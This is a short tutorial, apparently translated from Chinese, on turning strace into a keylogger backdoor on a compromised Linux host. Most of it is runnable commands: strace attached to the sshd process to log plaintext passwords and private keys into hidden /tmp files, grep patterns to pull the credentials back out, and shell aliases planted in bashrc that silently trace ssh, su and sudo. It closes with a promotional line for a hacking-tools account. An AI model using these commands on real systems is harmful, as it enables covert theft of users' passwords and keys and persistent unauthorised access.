Introduction
strace is a dynamic tracking tool that can track the execution of system calls. We can use it as a keylogger backdoor to expand our information collection range
scenes to be used
Get the shell through other means, through history, traffic capture, or the case where the password is not found locally. We want to get the password of the current host, or the password of connecting to other hosts through this host.
Record the plaintext password of the sshd process
Execute the following command
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)、
When the user logs in with a password, use the following command to view the recorded password
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log
Record the sshd private key
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)
When the user logs in with the private key, use the following command to view the recorded private key
grep 'PRIVATE KEY' /tmp/.sshd.log
Record ssh login credentials
We can also record the execution of ssh, su and other commands on the machine, here we take ssh as an example
- Modify alias
# Add the command vi ~/.bashrc or /etc/bashrc alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date'+%d%h%m%s'`. log -s 32 ssh' # Take effect immediately source ~/.bashrc
- carried out
ssh 10.xx.xx.148 -l mysql
There will be multiple logs in the /tmp/ directory
Read the password recorded in the log
grep -A 9 ‘password’ .ssh-202月021613809979.log
Record the alias of sudo and su
alias sudo='strace -f -e trace=read,write -o /tmp/.sudo-`date '+%d%h%m%s'`.log -s 32 sudo' alias su='strace -f -e trace=read,write -o /tmp/.su-`date '+%d%h%m%s'`.log -s 32 su'
Public Account: [ ***Testing Tutorial ] Focus on **testing,** research and development of automated weapons. Reply to 666, receive *** learning materials + tools for free! Hope to bring you harvest!